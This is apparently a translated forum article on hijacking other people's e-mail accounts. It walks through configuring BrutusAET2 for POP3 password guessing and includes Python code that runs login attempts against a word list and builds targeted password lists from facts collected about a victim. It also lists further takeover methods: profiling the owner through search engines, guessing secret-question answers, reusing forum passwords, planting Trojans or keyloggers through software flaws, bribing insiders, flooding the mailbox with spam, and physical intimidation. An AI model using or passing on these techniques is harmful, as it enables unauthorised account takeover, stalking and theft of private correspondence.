
Cracking mail accounts with BrutusAET2


So, I want to describe how to hijack a mailbox (e-mail account) using the BrutusAET2 program.

Let's start.

We will need:

1) The password-cracking program BrutusAET2, which can be downloaded from here:

2) Dictionaries (word lists), which can be taken from here:

3) Straight hands, i.e. some basic competence.

As the worked example I will take hijacking the mailbox @

Setting up BrutusAET2 for password cracking:

1) Open the program.
2) In the Target field, enter the address of the mail service's POP3 server (it is listed in the service's help or FAQ).
3) In the Type field, select POP3.

Connection Options:

1) Port: 110 (plain POP3).
2) Connections: the maximum, i.e. 60.
3) Timeout: the maximum, i.e. 60 seconds.

Bear in mind that 60 parallel connections and a stream of failed logins from one address are easy for a mail service to notice and throttle; a lower connection count is quieter.

POP3 options:
Leave them alone =)

Authentication options:

If we want to run through a list of mailboxes, we need to create a text file, call it users.txt, and put the list of user names into it.
For example:

Then in the program, tick the box next to Username.

Use Username: specify the path to the user list.

Now the password list...
Create a text file words.txt and put the passwords into it.
For example:

Back in the program, choose

Pass mode : Word list
Pass file : specify the path to the password list.

It is just as easy to crack mailboxes on other services: put the corresponding POP3 server in Target: and the rest is the same.

Overall it should look like this screenshot:
[Screenshot: the configured BrutusAET2 window ("Hacking mail")]
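What Brutus actually does per connection with the settings above is the plain POP3 USER/PASS exchange from RFC 1939. The following is an added example, not code from the article or from BrutusAET2: a client that performs one login attempt per connection with a timeout, and an in-process stub POP3 server (the user name alice and the password qwerty123 are constructed for the demo) so the dialogue can be run offline. The stub does not model the lockouts or rate limits a real mail service applies to failed logins.

```python
import poplib
import socketserver
import threading

# Constructed credentials for the in-process stub; not a real mail service account.
STUB_USERS = {"alice": "qwerty123"}


class _StubPOP3Handler(socketserver.StreamRequestHandler):
    """Just enough of POP3 (RFC 1939) to answer the greeting, USER, PASS and QUIT,
    so the client side of the exchange can be exercised without a network."""

    def handle(self):
        self.wfile.write(b"+OK stub POP3 server ready\r\n")
        user = None
        while True:
            line = self.rfile.readline()
            if not line:            # client went away
                return
            cmd, _, arg = line.decode("ascii", "replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"+OK name is a valid mailbox\r\n")
            elif cmd == "PASS":
                if user is not None and STUB_USERS.get(user) == arg:
                    self.wfile.write(b"+OK maildrop locked and ready\r\n")
                else:
                    self.wfile.write(b"-ERR invalid password\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"+OK bye\r\n")
                return
            else:
                self.wfile.write(b"-ERR unknown command\r\n")


def start_stub_server():
    """Bind the stub to an ephemeral localhost port, serve it on a daemon thread,
    and return (server, port) so the caller can shut it down."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _StubPOP3Handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def pop3_login(host, port, username, password, timeout=10):
    """One USER/PASS attempt on a fresh connection, which is what Brutus does per try.
    Returns True on +OK after PASS and False on -ERR. Network trouble (refused,
    timeout) raises instead: that is 'unknown', not 'wrong password', and must
    not be counted as a miss."""
    conn = poplib.POP3(host, port, timeout=timeout)   # reads the +OK greeting
    try:
        conn.user(username)
        conn.pass_(password)          # poplib raises error_proto on a -ERR reply
        return True
    except poplib.error_proto:
        return False
    finally:
        try:
            conn.quit()
        except (poplib.error_proto, OSError):
            pass


def try_candidates(host, port, username, candidates, timeout=10):
    """Walk a word list one connection per candidate and return the first hit, or None.
    Real services add lockouts and rate limits on failed logins; the stub does not."""
    for pw in candidates:
        if pop3_login(host, port, username, pw, timeout):
            return pw
    return None


if __name__ == "__main__":
    srv, port = start_stub_server()
    print("wrong :", pop3_login("127.0.0.1", port, "alice", "letmein"))
    print("right :", pop3_login("127.0.0.1", port, "alice", "qwerty123"))
    print("hit   :", try_candidates("127.0.0.1", port, "alice", ["123456", "password", "qwerty123"]))
    srv.shutdown()
    srv.server_close()
```

The point of separating the -ERR reply from a timeout or refused connection is that Brutus's "Timeout" setting decides how long a silent server is waited on; a timed-out attempt tells you nothing about the password and should be retried, not crossed off the list.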


=======================================================================

Mailbox password "recovery" methods

Method number 1. "Brutus" / slow /

The first method is Brutus (brute force): exhaustive password guessing.
What you need:
1. A brute-force program: BrutusA2 (WWWHack or similar)
2. The address of the mail service's incoming (POP3) server. It is listed in the help or FAQ section of the mail service's website.
3. A password dictionary (password list) is also desirable.
Pros: the password will always be found eventually (if not by dictionary, then by exhaustive search).
Cons: a guaranteed find may take several millennia or millions of years.
Since brute force is the slowest method, to cut it down you should:
a. Register a mailbox for yourself at the mail service you are going to attack. When registering, pay attention to the "Password" field. Your task is to learn the service's requirements for minimum and maximum password length and for the characters allowed (they are usually written next to the field).
b. Open the password dictionary (I prefer the Raptor program for this), sort it by password length (shortest first), and remove passwords whose length does not meet the service's requirements or which contain forbidden characters.
c. Use the data from the "Collecting information" method (see below).
Help for those without Internet access:
Brute force (colloquially: Brutus): exhaustive guessing, trying every combination. Example of brute force:

Example of guessing "by dictionary":
I.e., since many people choose meaningful, easy-to-remember words as passwords, why spend ages iterating over characters when iterating over words is faster?
P.S. Where to get the tools mentioned in this method:
BrutusA2 ->
Raptor ->
P.P.S. Passwords that people commonly choose are covered in another, separate article.

Method number 2. "Collecting information" / requires attention /

What you need:
Search engines:
What we do:
We type the target's e-mail address into the search engines and look for where it appears. We go through everything found (where it occurs, on which site, what they wrote and asked, when, under which login), copy it and keep it in Notepad for later analysis.
Then we analyze it, draw general conclusions about the person's interests, and try what we found (year of birth, nickname, name, interests, etc.) as the password.
Search every search engine both for the full address and for the login alone (my_email).
Ending up on a forum (having found their login/nickname): right-click their avatar image and look at the image path (what if they did not upload it to the forum but used one from their own website? (Although they could have taken someone else's.)) Open their profile and copy everything in it into Notepad as well (there may be an ICQ number, year of birth, interests, etc.). Do not forget the "Find all posts by user" link in the profile (if there is one). Read carefully; there may be a clue (keep the "Secret Question" in mind). Everything informative and different from "Gyg", "Lol", etc. goes into Notepad.
If we find their second e-mail address, we run it through the search engines again.
The same applies to ICQ (round the search engines again). For ICQ, do not forget to look at [forbidden link]
Also remember to search by e-mail address and nickname on
If they have an original nickname, AmSuPerrR say, also run it through the search engines. If the nickname is a common one like Alex, you can hardly sift through 12 million pages (though you can try search-query syntax and "search within results").
When a decent amount of information has accumulated in Notepad, start forming a password list for this user from it. In particular, the year of birth must be tried in different formats. For example, you found that the date of birth is 01.01.2005
Try these options:
Also try the options (where my_email is their login):
<his name>2005
<his name>05
Substitution is easy. Just copy into Notepad, "decompose" it into words in a column, and write several variants for each item found. After that you can use the Brutus method.
Also check whether the "second addresses" you found still exist. It may turn out that they were registered long ago and then no longer needed. Then you register the address for yourself and use it to recover the passwords for forums, chats, directories, etc.
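The two mechanical steps above, building a password list out of the collected facts (method 2) and then trimming it to what the service's registration form would have accepted and ordering it shortest first (method 1, step b), are shown together in this added example. It is not code from the article or from the Raptor program; the facts (login my_email, name Alex, nickname AmSuPerrR, date of birth 01.01.2005) are constructed from the article's own placeholders, the FACTS key names are this example's choice, and the allowed character set is an assumption to be replaced with what the real form says.

```python
import re
from datetime import date

# Constructed "collected information" for an imaginary target; not real data.
# The key names are assumptions of this example, not fields the article defines.
FACTS = {
    "login": "my_email",      # the login part of the address (the article's placeholder)
    "name": "Alex",
    "nickname": "AmSuPerrR",
    "birthdate": date(2005, 1, 1),
}


def date_formats(d):
    """The date of birth written out in the various formats the article says to try."""
    return [
        f"{d.year}",                                    # 2005
        f"{d.year % 100:02d}",                          # 05
        f"{d.day:02d}{d.month:02d}{d.year}",            # 01012005
        f"{d.day:02d}{d.month:02d}{d.year % 100:02d}",  # 010105
        f"{d.day:02d}.{d.month:02d}.{d.year}",          # 01.01.2005
        f"{d.year}{d.month:02d}{d.day:02d}",            # 20050101
        f"{d.day}{d.month}{d.year}",                    # 112005 (no zero padding)
    ]


def candidate_passwords(facts):
    """Turn the notepad of facts into a password list: every collected word on its
    own, every date format on its own, then word+date and date+word with a few
    common separators. First-seen order is kept and duplicates are dropped."""
    words = []
    for w in (facts["login"], facts["name"], facts["nickname"]):
        for variant in (w, w.lower(), w.capitalize()):
            if variant not in words:
                words.append(variant)
    dates = date_formats(facts["birthdate"])
    out = []
    seen = set()

    def add(p):
        if p not in seen:
            seen.add(p)
            out.append(p)

    for w in words:
        add(w)
    for d in dates:
        add(d)
    for w in words:
        for d in dates:
            for sep in ("", "_", "."):
                add(f"{w}{sep}{d}")
                add(f"{d}{sep}{w}")
    return out


def filter_by_policy(candidates, min_len, max_len, allowed=r"A-Za-z0-9_"):
    """Apply what you learned from the service's registration form: drop candidates
    of the wrong length or with characters the service forbids (the allowed set
    here is an assumption; read the real one off the form), then order shortest
    first, as method 1 step b does for the dictionary."""
    ok = re.compile(rf"^[{allowed}]+$")
    keep = [c for c in candidates if min_len <= len(c) <= max_len and ok.match(c)]
    return sorted(keep, key=len)      # stable sort: same-length items keep their order


if __name__ == "__main__":
    raw = candidate_passwords(FACTS)
    usable = filter_by_policy(raw, min_len=6, max_len=16)
    print(f"{len(raw)} raw candidates, {len(usable)} after the policy filter")
    print(usable[:12])
```

Run as is, it prints how many candidates the facts produce and the first dozen that survive a 6 to 16 character, letters-digits-underscore policy; dotted dates such as 01.01.2005 are generated but filtered out under that policy, which is exactly the waste step b removes from a dictionary before handing it to Brutus.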

Method number 3. "Password recovery" / sometimes effective /

What we do:
First go to the mail service and click the "Forgot your password?" link (or similar). Look at what the secret question is.
For example, if it is "My favorite dish", then for girls you can try the word ice cream.
If it is "Grandmother's year of birth", "Passport number" or "Mother's maiden name", then try 111, 123, 12345, the year of birth of the person whose password you are "recovering", or perhaps the year the mailbox was registered, etc., since people rarely know their grandmother's year of birth or remember their mother's maiden name. Passport numbers are harder, as some people really do type in the real one. But still try 111, 123 ...
The data collected with the "Collecting information" method can also help here.

Added (Eco[L]og):
Sometimes the secret question can be something like: 1234567qwerty
Then, in some cases, the answer to it may be 1234567qwerty
Or something similar typed by randomly mashing the keyboard (guessing that is almost unrealistic).

Method number 4. "Recovery from another service" / in a hurry you can take both the mailbox password and the forum/chat database /

The whole point is that a mailbox password is harder to obtain than the password for a forum, chat, dating site, LiveJournal, etc., i.e. the places that the owner of the mailbox being "recovered" visits or visited. So we go round all the sites, forums, etc. that came into view during "Collecting information". We look at what runs there, for example the forum software, and the task is now reduced to finding vulnerabilities in that forum (using the same
There is a chance (not a big one, but a chance) that the forum password also fits the mailbox.

Method number 5. "Trojan" / demanding /

The method speaks for itself. The task is to plant a Trojan or some keylogger (which you should have, accordingly) and wait for reports (logs) from it.
The "Software vulnerabilities" and "SE / Social engineering /" methods help with the delivery.

Method number 6. "Software vulnerabilities" / requires the necessary knowledge /

This is mostly a helper method for the Trojan method. Getting the Trojan in takes a lot of effort. It becomes easier if you know current vulnerabilities in software: browsers, mail programs (Outlook, The Bat!, etc.), perhaps ICQ. Then the task is reduced to getting the victim to follow a link to your site, where the visitor picks up the Trojan through a browser vulnerability, or to sending a specially crafted letter.

Method number 7. "Vulnerabilities of mail services" / also requires knowledge, or the ability to use a search engine /

This method relies directly on vulnerabilities in the mail services themselves. They turn up from time to time: from a letter which, when viewed, makes the user's browser change some setting, to a recent trick in which the request that changes the password of your own mailbox is intercepted, modified, and replayed to change the password of the target mailbox. And so on.

Method number 8. "Have a hundred rubles, and friends can wait" / paid; requires having a job and a WM (WebMoney) wallet /

You go to a hacker-adjacent site and ask, for a certain fee, to have the password "reminded". But be careful when paying, as a great many scammers have appeared (not that they were absent before; they have always been there).
Never pay in advance (100% guarantee that nobody will "remind" you the password; more precisely, some people can deliver it, but they decide whether you pay before or after, and mostly they take payment after the order is done).
As proof, do not be taken in by a letter sent from the mailbox you want.
Also do not immediately fall for proof of this kind:
You send some letter to the required mailbox, and then (after a while) you are sent the text of that letter.
As protection against scams you can use the "through a Guarantor" scheme, or the scheme above, slightly corrected:
1. You agree on a time when you are both online.
2. You send some text to the "required" mailbox and you should be told immediately what text you sent.
Then at least there is a guarantee that the mailbox is under their control. How to transfer the money, negotiate yourselves.

Method number 9. "Don't have a hundred rubles, have a hundred friends" / the ability to make acquaintances /

Simply have a good friend (admin, support, or better still the director) working either at the office where the mailbox is hosted, or at the provider of hosting/Internet for that office.
Or one who, at the risk of acquiring problems with the FSB, FAPSI or Department "K" (R), will exceed their official authority, obtain the password from the mail service's support and tell it to you.
This is a very bad and wrong method, and it almost never works (thank God).
Or have a friend who is the administrator of the forum, chat, etc. where these people hang out. If you are not acquainted, nothing stops you from getting acquainted somehow...

Method number 10. "SE / Social engineering /" / The most precise method. Requires the ability to set the task and analyze; training required /

Many of the methods described earlier converge on and overlap with this one. Likewise, this method requires some data from the other methods (such as "Collecting information", "Vulnerabilities of mail services", etc.).
This is the most extensive and wide-ranging method, so only briefly here; it goes into a separate article.
The general idea is to obtain the mailbox password directly from its owner, or to persuade the owner to perform whatever actions you need (such as reliably launching the Trojan).
"Obtaining it directly from the owner" means that the owner "tells" you the password without even understanding that they have given it to you (or perhaps they will understand, but later).
P.S. The SE method and its sub-methods are for the next article (if there is the desire and interest).

Method number 11. "What the hell does he need it for?" / slow but relatively simple /

The essence is to make the owner abandon the mailbox voluntarily (sometimes, after all, you need to "recover" it not to read it but to own the address). The easiest way is simply to spam the mailbox periodically. If the owner is not clued up enough to get rid of such spam, in a couple of weeks they will get tired of raking tons of letters out of the box and abandon it. Mail services are not infinite: when a mailbox has a space limit and is no longer visited, it will eventually be deleted.

And finally, an alternative method
Method number 12. "Fear" / criminal /

You catch the owner in the doorway ...